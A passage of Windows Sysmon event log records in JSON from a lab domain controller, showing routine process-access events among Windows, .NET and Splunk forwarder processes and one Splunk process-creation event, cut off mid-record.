{"EventTime":"2020-08-01 08:04:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6814,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:42.070\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:42.070","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6815,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:42.070\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-221A-5F25-0000-00108FEB0A00}\r\nTargetProcessId: 4152\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:42.070","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-221A-5F25-0000-00108FEB0A00}","TargetProcessId":"4152","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6816,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:42.132\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-221A-5F25-0000-00102FED0A00}\r\nTargetProcessId: 4564\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:42.132","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-221A-5F25-0000-00102FED0A00}","TargetProcessId":"4564","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6817,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:42.132\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-221A-5F25-0000-00102FED0A00}\r\nTargetProcessId: 4564\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:42.132","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-221A-5F25-0000-00102FED0A00}","TargetProcessId":"4564","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:04:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6818,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:42.148\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-221A-5F25-0000-00102FED0A00}\r\nTargetProcessId: 4564\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:42.148","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-221A-5F25-0000-00102FED0A00}","TargetProcessId":"4564","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6819,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:43.257\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-221B-5F25-0000-00103DF20A00}\r\nTargetProcessId: 4504\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:43.257","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-221B-5F25-0000-00103DF20A00}","TargetProcessId":"4504","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6820,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:43.257\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-221B-5F25-0000-00103DF20A00}\r\nTargetProcessId: 4504\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:43.257","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-221B-5F25-0000-00103DF20A00}","TargetProcessId":"4504","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:04:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6821,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:43.257\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-221B-5F25-0000-00103DF20A00}\r\nTargetProcessId: 4504\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:43.257","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-221B-5F25-0000-00103DF20A00}","TargetProcessId":"4504","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6822,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:43.414\r\nProcessGuid: {41C8662E-221B-5F25-0000-00104AF50A00}\r\nProcessId: 4248\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:04:43.414","ProcessGuid":"{41C8662E-221B-5F25-0000-00104AF50A00}","Image":"C:\\Program 